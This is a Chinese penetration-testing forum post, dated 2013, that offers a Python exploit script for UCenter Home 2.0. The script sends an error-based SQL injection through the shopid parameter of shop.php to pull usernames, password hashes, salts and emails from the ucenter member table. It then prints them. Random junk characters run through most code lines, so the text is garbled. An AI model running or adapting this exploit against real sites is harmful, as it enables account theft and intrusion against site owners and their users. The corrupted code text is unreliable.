找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2088|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
( `4 @/ H) J" X* B8 v( S
8 H/ i! d! k  ?9 a! E
% y  a" L) q+ \& ]9 E6 d#!/usr/bin/env python  * s1 E& h8 L% B9 w: D: r8 c
0 U9 i& k; C7 k, ?
import sys  0 ]5 |- t' l3 [8 Z) U8 J
import urllib2  - n; T% M" o+ d6 ?# [% A0 L) u% {
import re  ; t; Y6 T4 l0 L/ I- q! z) w9 a
+ }+ r! l3 n" P, R7 P& g& Z
def info():  - ^0 _: Q( |8 G( K* h, v
    print 'From:http://www.exploit-db.com/exploits/14997/' 1 a* }, ~% u8 N, M: c, A5 v0 }
    print 'http://www.hake.cc/Web_loudong/' - k- z5 I  B# ]6 B* J% T2 F
    print 'changed:qiaoy'  
# t, T) d' T; x6 z7 b" ~7 Y9 m    print 'exp:'  1 W/ [# q& w# B" x
    print ' ./UCenter_Home_2.0.py site'  9 L; ]' j7 W9 P( a# Z
5 f0 C: N1 \# f$ ?$ a1 @5 c2 U' g
def main():    @( @1 U" b' o) ]! u
    if len(sys.argv) != 2:  
2 v1 u9 Q2 [- ~- _- m9 O1 Y        info()  6 r7 F% i( }# z
    else:  
+ u' Z& k. v# R7 Y        site = sys.argv[1]  & P) O  V; t+ k/ q# ~1 N2 L
        if site[0:7] == 'http://':  
# C+ \1 y. E% e( N. W, a. L            sitesite =site  
5 J. q; u& L$ b1 Y2 y3 m+ X% S        elif site[0:8] == 'https://':  
% p7 l( B  C, }, b' j  h            sitesite = site  8 c7 H6 e% u1 p. A# S8 h
        else:  : P9 t& m- V& G5 m" m
            site = 'http://'+site  7 E  L) a( F; d6 T/ S
        try:  
( l4 `4 c  I& D6 f            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  9 v0 c) ^6 b1 `7 u  w1 k/ q
            Value = urllib2.urlopen(url).read()  9 `7 |# ]1 y: O3 U
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
5 v  `5 A7 x. p; P$ g1 U% u            hacked = Msg.split(':')  - z& t! ], F  G% O. `1 N7 K
            print 'Name:    '+hacked[1]  5 d. Z* l. r4 g) o! {
            print 'Passwd:  '+hacked[2]  6 n) [- d% S  ^, x9 o; p6 y3 d  ^
            print 'salt:    '+hacked[3]  
0 {# w, B, B; h$ _% H  l" \/ F' S( J6 k% R            print 'email:   '+hacked[4]  5 _/ t; q: T! |0 L2 D
        except:  
" j4 W, L& \( U, x8 f            print 'Sorry,I can\'t work............'  
% ^  f; \. L: D/ B2 ^- g$ g, h5 r 4 k+ |1 Q% K- S4 c; X& i
if __name__ == '__main__':  3 J9 F  o# o4 ?
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表